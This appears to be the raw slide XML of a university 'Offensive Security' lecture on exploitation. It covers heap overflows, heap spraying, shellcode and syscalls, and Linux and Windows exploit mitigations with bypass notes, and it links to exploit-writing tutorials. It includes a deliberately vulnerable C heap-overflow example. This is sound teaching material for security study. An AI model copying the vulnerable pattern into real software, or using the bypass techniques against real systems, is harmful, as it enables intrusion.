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9B9B0F-E442-49EA-80F9-FC4CC93A2119}">
  <a:tblStyle styleId="{AC9B9B0F-E442-49EA-80F9-FC4CC93A2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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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Shape 1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7"/>
            <a:ext cx="7314320" cy="4116300"/>
            <a:chOff x="-11" y="1378677"/>
            <a:chExt cx="7314320" cy="4116300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3" y="-12188"/>
            <a:ext cx="8005728" cy="1612601"/>
            <a:chOff x="-13" y="-12188"/>
            <a:chExt cx="8005728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45" y="1704685"/>
            <a:ext cx="4038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704685"/>
            <a:ext cx="40386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75" name="Shape 75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13" y="-12188"/>
            <a:ext cx="8005728" cy="1612601"/>
            <a:chOff x="-13" y="-12188"/>
            <a:chExt cx="8005728" cy="1161900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Shape 76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-13" y="-12188"/>
            <a:ext cx="8005728" cy="1612601"/>
            <a:chOff x="-13" y="-12188"/>
            <a:chExt cx="8005728" cy="1161900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Shape 81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H="1">
            <a:off x="8964666" y="6165015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3866778" y="6165015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66813" y="6165015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8" y="-94"/>
            <a:ext cx="3409813" cy="2810236"/>
            <a:chOff x="0" y="1494"/>
            <a:chExt cx="3409813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8"/>
            <a:ext cx="3409813" cy="2810236"/>
            <a:chOff x="0" y="1494"/>
            <a:chExt cx="3409813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://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf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://exploiting.wordpress.com/2012/10/03/html5-heap-spray-eusecwest-2012/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://www.phrack.org/issues.html?issue=58&amp;id=4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://www.phrack.org/issues.html?issue=58&amp;id=4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://grsecurity.net/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://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf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://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx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hyperlink" Target="http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx" TargetMode="Externa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://dl.packetstormsecurity.net/papers/general/sehop_en.pdf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hyperlink" Target="https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/" TargetMode="Externa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5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://blog.ioactive.com/2012/12/striking-back-gdb-and-ida-debuggers.html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6.gif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relan.b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bysssec.com/blog/tag/safeseh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nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html?hp&amp;_r=1&amp;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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh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www.openrce.org/articles/full_view/21" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.gif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www.openrce.org/articles/full_view/21" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.gif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gif"/><Relationship Id="rId4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://insecure.org/stf/smashstack.html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8.gif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www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf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0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www.youtube.com/watch?v=ls_lfZdurHM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://source.winehq.org/source/include/wine/exception.h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wiki.ubuntu.com/Apport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ellman/shtest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://www.blackhat.com/presentations/bh-usa-09/MCDONALD/BHUSA09-McDonald-WindowsHeap-PAPER.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.insomniasec.com/publications/Heaps_About_Heaps.ppt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://gee.cs.oswego.edu/dl/html/malloc.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.gif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://gee.cs.oswego.edu/dl/html/malloc.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.gif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Exploitation 102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DE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIS 4930 / CIS 5930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DE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Offensive Security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DE2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring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Intel vs AT&amp;T syntax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We're going with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>syntax, as it was used last week and is used in our book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i="1" lang="en"/>
              <a:t>(And b/c I hate AT&amp;T syntax)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GNU debugging tools default to AT&amp;T syntax, Here's how to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="3000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FIX</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> that for each of the following tools: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GDB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show disassembly-flavor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to see which one you are set to currently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set disassembly-flavor intel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to fix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gcc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gcc -masm=intel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nasm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(is default intel syntax)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objdump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objdump -M intel -d program_name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heap overflow 2</a:t>
            </a:r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 basic heap overflow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 (int argc, char** argv)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*buf;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*buf2;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buf   = (char*) malloc (1024);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buf2 = (char*) malloc (1024);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printf("buf=%p buf2=%P\n", buf, buf2);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strcpy (buf,argv[1]); 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/// allows us to overwrite the meta data for buf2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free(buf2);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2717525" y="4900100"/>
            <a:ext cx="58632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If an attacker overwrites the meta data with garbage,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intfree </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>will fail, and cause SIGSEGV (Segmentation fault) b/c it cannot locate the "previous" chunk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But an attacker can recreate the chunk header!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	when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intfree </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>navigates to the new pointer for the "previous" chunk you can redirect execution.... what could go wrong??? </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en"/>
              <a:t>:D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Heap</a:t>
            </a:r>
          </a:p>
        </p:txBody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Multiple heaps!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Each process gets a default one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000"/>
              <a:t>all threads share this common one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Some loaded .dll's create their own heap!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Can create separate heaps for different purposes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000"/>
              <a:t>alloc(0x1000, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"/>
              <a:t>RWX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>)    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000"/>
              <a:t>what could go wrong??   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"/>
              <a:t>:D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000"/>
              <a:t>Some .dlls hold pointers to the heap they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Feng Shui</a:t>
            </a:r>
          </a:p>
        </p:txBody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http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf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The art of manipulating the allocation of heap blocks in order to redirect the program control flow to the shellcode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(shellcode on the heap)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-3810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Commonly used on malicious webpages using JavaScript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Sprays</a:t>
            </a:r>
          </a:p>
        </p:txBody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technique that attackers use to allocate large chunks of malicious code on the heap, in hopefully predetermined locations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Common on malicious webpages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most use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to allocate a ton of NOP-sled+shellcode chunks on the heap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then some browser exploit to point EIP to the heap, and hope it hits a NOPsled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can beat ASLR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be accomplished on webpages with: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JavaScript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VBScript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ActionScript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Images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HTML5 </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>(see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http://exploiting.wordpress.com/2012/10/03/html5-heap-spray-eusecwest-2012/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>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By itself, is not a security issue, but can be used by other vulnerabilities to make exploits easier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Executable Security Mechanisms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="963" name="Shape 963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AKA </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>exploit mitigations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should protect what?</a:t>
            </a:r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Heap?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segment permissions?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vs instructions?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registers?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overflows?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="970" name="Shape 970"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301628" y="3128878"/>
            <a:ext cx="2589300" cy="2589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OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="971" name="Shape 971"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2972575" y="1810928"/>
            <a:ext cx="2764200" cy="276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Linker / Compiler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72" name="Shape 972"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3359028" y="3509878"/>
            <a:ext cx="2589300" cy="2589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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Hardware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3487325" y="4000500"/>
            <a:ext cx="629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exploit mitigations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N^X</a:t>
            </a:r>
          </a:p>
        </p:txBody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Means "Never eXecute [bit]"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is a bit flag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Employs the following principle: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 u="sng"/>
              <a:t>If it is writeable, then it is NOT executable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prevents execution of the stack, and the heap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Ways attackers can bypass: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ret2libc  (return to lib c)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en"/>
              <a:t>Reference for further learning on advanced ret2libc exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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http://www.phrack.org/issues.html?issue=58&amp;id=4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GCC extensions to protect stack (stack cookies)</a:t>
            </a:r>
          </a:p>
        </p:txBody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StackGuard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>extension for the gcc compiler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>provides a weak canary protection against buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>only protects the Return Address on stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>not adopted by the GCC project team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GCC Stack-Smashing Protector (ProPolice)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 version of this was re-implemented in GCC 4.1 and later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/>
              <a:t>currently standard part of OpenBSD, FreeBSD, Ubuntu, etc...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better designed canary generation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protects function arguments, and not just Return Address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rearranges variables to deter overflowing them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also backs up copies of function arguments to check against later on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ASLR (in Linux)</a:t>
            </a:r>
          </a:p>
        </p:txBody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 Space Layout Randomization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is set in /proc/sys/kernel/randomize_va_space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set to &gt; 0 when turned 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randomly arranges the positions of key data areas upon process initialization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positions of the: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i="1" lang="en" u="sng"/>
              <a:t>(usually)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the base of the executable (i.e. not starting at a fixed 0x0000 every time)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libraries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heap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stack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Outright breaks any shellcode with hardcoded addressing techniques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breaks return-2-library attacks (libraries load in random locations!)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b="1" lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(n.) - a set of instructions injected and then executed by an exploited program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Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>originally just for spawning a shell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Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>now refers to any exploit code at the assembly level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1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is used to directly manipulate registers and the function of a program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Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thus generally written in assembly (ASM)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Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>then translated to hexadecimal opcodes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1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are often subtle nuances in programs written in high level languages that prevent shellcode from executing cleanly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Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thus we need to learn how to write our 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ASLR (in Linux)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Shape 100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Bypass notes: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weak version of ASLR has been in linux since kernel 2.6.12 (June 2005)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not enough entropy and randomness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>!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attackers could still brute force exploits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usually tens of thousands of tries only needed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SIGSEV leaves logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>brute force @ 4AM...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many kernel patches from the community offer hardened implementations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i="1" lang="en"/>
              <a:t>but they are still brute force-able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attackers have an advantage when can use buffer overflows as part of some I/O operation (not as part of command line arguments)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i.e. network service, with I/O on the socket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randomization has already occurred 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the randomization details can be accessed in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/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> files!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PaX Linux Kernel Patch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1008" name="Shape 100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http://pax.grsecurity.net/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better ASLR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implements N^X by default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small efforts to mitigate ret2libc exploits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Kernel patch to add lots more security mechanisms to harden against buffer overflow exploits and more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Bypass notes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section 4 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http://www.phrack.org/issues.html?issue=58&amp;id=4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>details on beating PaX address space randomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a bit old, but good read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grsecurity patch</a:t>
            </a:r>
          </a:p>
        </p:txBody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http://grsecurity.net/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includes PaX (GR security team and PaX team partnered up!)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optimized for web servers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grsecurity offers kernel hardening patch(es) for each kernel version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"grsecurity provides real proactive security. The only solution that hardens both your applications and operating system, grsecurity is essential for public-facing servers and shared-hosting environments."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hardens against LD_PRELOAD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better ASLR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much much moar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exploit mitigations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Data Execution Prevention (DEP)</a:t>
            </a:r>
          </a:p>
        </p:txBody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Microsoft's take on NX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Mark anything memory page that is writable as not-executable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Makes stack and heap NOT Executable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 more shellcode there!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still have control data there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can still return to libc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ASLR (in Windows)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Shape 103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Enabled by default in Vista and beyond (2007)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however ONLY for executables and DLLs that are specifically linked to be ASLR-enabled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Registry setting for forcibly enabling/disabling ASLR for ALL executables and libraries is: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HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages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Locations that are randomized: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heap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Process Environment Block (data block of main thread)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Thread Environment Block (shared data block for threads)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Bypass notes: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ASLR on 32 bit windows system prior to Windows 8 can have reduced effectiveness when attackers eat up resources and cause low memory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Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody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5528737" y="1704688"/>
            <a:ext cx="31581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38" name="Shape 10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5" y="1668125"/>
            <a:ext cx="54006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Cookies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/GS protection</a:t>
            </a:r>
          </a:p>
        </p:txBody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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/GS switch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is a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>compiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> option that adds code to function's prologue and epilogue code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Prevents typical stack based / string buffer overflows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an application starts, a program-wide master cookie (4 byte unsigned int (dword)) is pseudo-randomly generated and saved in the .data section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Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  (Great read!) (previously mentioned in SEH section)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Cookies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/GS (Buffer Security Check)</a:t>
            </a:r>
          </a:p>
        </p:txBody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Enabled by default since 2003 in microsoft visual studio compiler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can be disabled with /GS- flag and recompiled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Compiler injects checks in functions with local string buffers and/or exception handling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/GS features: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attempts to detect direct buffer overflows that target the return address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protects against vulnerable parameters for a function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pointer, C++ reference, C-struct that contains pointers, or string buffers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Stack Cookies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/GS (Buffer Security Check)</a:t>
            </a:r>
          </a:p>
        </p:txBody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Bypass notes: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/GS provides no protection when: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/>
              <a:t>function parameters do not include buffers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/>
              <a:t>if /O (optimizations) flag is not enabled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/>
              <a:t>functions have a variable argument list(....)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/>
              <a:t>functions are marked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naked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>   (in C++)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/>
              <a:t>Functions contain any inline assembly in the first statement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/>
              <a:t>If a parameter is only used in certain ways the compiler deems to be *less likely* to be exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="36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System Calls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Not the same as system() in libc...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One way to manipulate the target program is to force it to make a system call, or syscall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en"/>
              <a:t>Differ per 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Syscalls are extremely powerful (allow access to OS level functions)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en"/>
              <a:t>Usually when a user mode program attempts to access kernel memory space,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access exception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is triggered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en"/>
              <a:t>syscalls serve as the interface between user and kernel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/>
              <a:t>Two methods for syscall execution in Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="9144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/>
              <a:t>C library wrapper (LIBC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="914400" rtl="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/>
              <a:t>execute the syscall directly with assembly </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>load the appropriate arguments on the stack, then </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int 0x80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/>
              <a:t>Syscalls in linux are implemented via </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>software interrupts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/SAFESEH</a:t>
            </a:r>
          </a:p>
        </p:txBody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SafeSEH is a linker option, applied when compiling an executable file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Discussed in detail previously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Makes sure the SE Handler points to a valid chain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fails if it points outside of the image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fails if it points to the heap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SEHOP</a:t>
            </a:r>
          </a:p>
        </p:txBody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3278883" y="1704688"/>
            <a:ext cx="54081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Introduced in win server 2008 and win 7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Comes from a Matt Miller article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http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx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Before the exception dispatcher function jumps to the SE Records, it parses the *Next SEH record chain to make sure its intact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Final SEH record in a SEHOP validated chain is FFFFFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-3175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1400"/>
              <a:t>ntdll!FinalExceptionHandler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267625" y="18191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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1070" name="Shape 1070"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1069" idx="1"/>
            <a:endCxn id="1069" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267625" y="24642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1" name="Shape 1071"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648625" y="3266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0x01234FE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0x0ABCFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1072" name="Shape 1072"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953425" y="48671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0x01235A6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0x0ABD0F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1073" name="Shape 1073"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="648625" y="3912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4" name="Shape 1074"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="953425" y="55122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5" name="Shape 1075"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2106925" y="21466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076" name="Shape 1076"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487925" y="37468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077" name="Shape 1077"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2792725" y="52708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078" name="Shape 1078"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611658" y="44575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 06 90 90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(short jump)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9" name="Shape 1079"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611658" y="51742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0" name="Shape 1080"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6523683" y="40445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1081" name="Shape 1081"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611658" y="5860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2" name="Shape 1082"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6058433" y="46301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1083" name="Shape 1083"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6058433" y="52397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3696446" y="3466375"/>
            <a:ext cx="2834569" cy="1466889"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="110251" w="116745">
                <a:moveTo>
                  <a:pt x="9110" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7615" y="5232"/>
                  <a:pt x="700" y="20618"/>
                  <a:pt x="140" y="31394"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-420" y="42170"/>
                  <a:pt x="2070" y="55250"/>
                  <a:pt x="5746" y="64656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9421" y="74061"/>
                  <a:pt x="13470" y="81099"/>
                  <a:pt x="22191" y="87827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30911" y="94554"/>
                  <a:pt x="42310" y="101281"/>
                  <a:pt x="58069" y="105019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73828" y="108756"/>
                  <a:pt x="106965" y="109379"/>
                  <a:pt x="116745" y="11025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085" name="Shape 1085"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279250" y="4774450"/>
            <a:ext cx="183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EB 06 90 90, or whatever the short jmp, NOP, NOP code is will likely point somewhere invalid.  Thus caught by SEHOP...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1086" name="Shape 1086"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8549150" y="4895900"/>
            <a:ext cx="289500" cy="32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7" name="Shape 1087"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8894850" y="5008025"/>
            <a:ext cx="9300" cy="63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8" name="Shape 1088"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8661250" y="5082775"/>
